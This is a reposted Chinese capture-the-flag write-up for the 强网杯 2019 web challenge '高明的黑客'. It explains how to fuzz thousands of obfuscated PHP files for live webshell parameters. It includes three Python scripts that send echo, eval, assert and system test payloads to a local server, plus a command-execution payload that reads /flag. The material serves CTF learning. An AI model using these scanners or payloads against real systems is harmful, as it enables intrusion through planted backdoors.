[强网杯 2019]高明的黑客

Posted keelongz

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[强网杯 2019]高明的黑客相关的知识,希望对你有一定的参考价值。

题目一览

进局子的前端:

技术图片

那么先访问一下www.tar.gz,果然可以下载“

技术图片

然后我人就傻掉了……

技术图片

全是些莫名其妙的东西,难不成php也有花代码这么一说?

技术图片

考点:fuzz脚本的编写

其实这些文件都是有讲究的,既然告诉你网站已经被黑了,这些源码中其实就藏着??

那其实思路就简单了……找出这些源码中所有的GET和POST请求,模拟请求一遍,看看那个能RCE不就行了。

放上我的一波脚本……还是太菜了,就写了GET的,依旧慢的像蜗牛:

import requests
import re
import os

path = ‘****‘ #文件路径
url = ‘‘ #url
r = re.compile(br"$_GET[‘(w+)‘]");#匹配$_GET[‘XXX‘]
f_list = os.listdir(path)

for file in f_list: #逐步读文件
    f = open(path + file)
    con = f.read() 
    tmp = r.findall(con) #遍历所有GET请求
    for j in tmp:
        exp = url + file + ‘?‘ + j[1] + ‘=echo fuzz;‘ #构造GET请求的URL,带参传echo
        res = requests.get(exp).text
        if ‘777‘ in res: #若找到,输出
            print(‘Find ‘+exp)
            exit(0)

不过是能跑出来的:

技术图片

直接构造payload:

/xk0SzyKwfzw.php?Efa5BVG=cat /flag

拿到flag:

技术图片

这里贴一下飘零师傅的脚本:运用了线程池,速度快了很多(py2)

import requests
from multiprocessing import Pool

base_url = "http://localhost:8888/src/"
base_dir = "/Desktop/site/src/"
file_list = [‘zzt4yxY_RMa.php‘,........ ‘m_tgKOIy5uj.php‘, ‘aEFo52YSPrp.php‘, ‘Hk3aCSWcQZK.php‘, ‘RXoiLRYSOKE.php‘]

def extracts(f):
    gets = []
    with open(base_dir + f, ‘r‘) as f:
        lines = f.readlines()
        lines = [i.strip() for i in lines]
        for line in lines:

            if line.find("$_GET[‘") > 0:
                start_pos = line.find("$_GET[‘") + len("$_GET[‘")
                end_pos = line.find("‘", start_pos)                
                gets.append(line[start_pos:end_pos])

    return gets

def exp(start,end):
    for i in range(start,end):
        filename = file_list[i]
        gets = extracts(filename)
        print "try: %s"%filename 
        for get in gets:
            now_url = "%s%s?%s=%s"%(base_url,filename,get,‘echo "sky cool";‘)
            r = requests.get(now_url)
            if ‘sky cool‘ in r.content:
                print now_url
                break
    print "%s~%s not found!"%(start,end)


def main():
    pool = Pool(processes=15)    # set the processes max number 3
    for i in range(0,len(file_list),len(file_list)/15):
        pool.apply_async(exp,(i,i+len(file_list)/15,))
    pool.close()
    pool.join()

 
if __name__ == "__main__":
    main()

当然还有赵师傅的脚本了,工整的很:(py3)

import os
import threading
from concurrent.futures.thread import ThreadPoolExecutor

import requests

session = requests.Session()

path = "/Users/jinzhao/PhpstormProjects/qwb/web2/"  # 文件夹目录
files = os.listdir(path)  # 得到文件夹下的所有文件名称

mutex = threading.Lock()
pool = ThreadPoolExecutor(max_workers=50)

def read_file(file):
    f = open(path + "/" + file);  # 打开文件
    iter_f = iter(f);  # 创建迭代器
    str = ""
    for line in iter_f:  # 遍历文件,一行行遍历,读取文本
        str = str + line

    # 获取一个页面内所有参数
    start = 0
    params = {}
    while str.find("$_GET[‘", start) != -1:
        pos2 = str.find("‘]", str.find("$_GET[‘", start) + 1)
        var = str[str.find("$_GET[‘", start) + 7: pos2]
        start = pos2 + 1

        params[var] = ‘echo("glzjin");‘

        # print(var)

    start = 0
    data = {}
    while str.find("$_POST[‘", start) != -1:
        pos2 = str.find("‘]", str.find("$_POST[‘", start) + 1)
        var = str[str.find("$_POST[‘", start) + 8: pos2]
        start = pos2 + 1

        data[var] = ‘echo("glzjin");‘

        # print(var)

    # eval test
    r = session.post(‘http://localhost:11180/web2/‘ + file, data=data, params=params)
    if r.text.find(‘glzjin‘) != -1:
        mutex.acquire()
        print(file + " found!")
        mutex.release()

    # assert test
    for i in params:
        params[i] = params[i][:-1]

    for i in data:
        data[i] = data[i][:-1]

    r = session.post(‘http://localhost:11180/web2/‘ + file, data=data, params=params)
    if r.text.find(‘glzjin‘) != -1:
        mutex.acquire()
        print(file + " found!")
        mutex.release()

    # system test
    for i in params:
        params[i] = ‘echo glzjin‘

    for i in data:
        data[i] = ‘echo glzjin‘

    r = session.post(‘http://localhost:11180/web2/‘ + file, data=data, params=params)
    if r.text.find(‘glzjin‘) != -1:
        mutex.acquire()
        print(file + " found!")
        mutex.release()

    # print("====================")

for file in files:  # 遍历文件夹
    if not os.path.isdir(file):  # 判断是否是文件夹,不是文件夹才打开
        # read_file(file)

        pool.submit(read_file, file)


我还是别说我学过python了……

以上是关于[强网杯 2019]高明的黑客的主要内容,如果未能解决你的问题,请参考以下文章

[原题复现]强网杯 2019 WEB高明的黑客

BuuCTF Web Writeup 第二部分

强网杯2019—UPLOAD

刷题记录:[强网杯 2019]Upload

强网杯 2019 随便注

[强网杯2019]随便注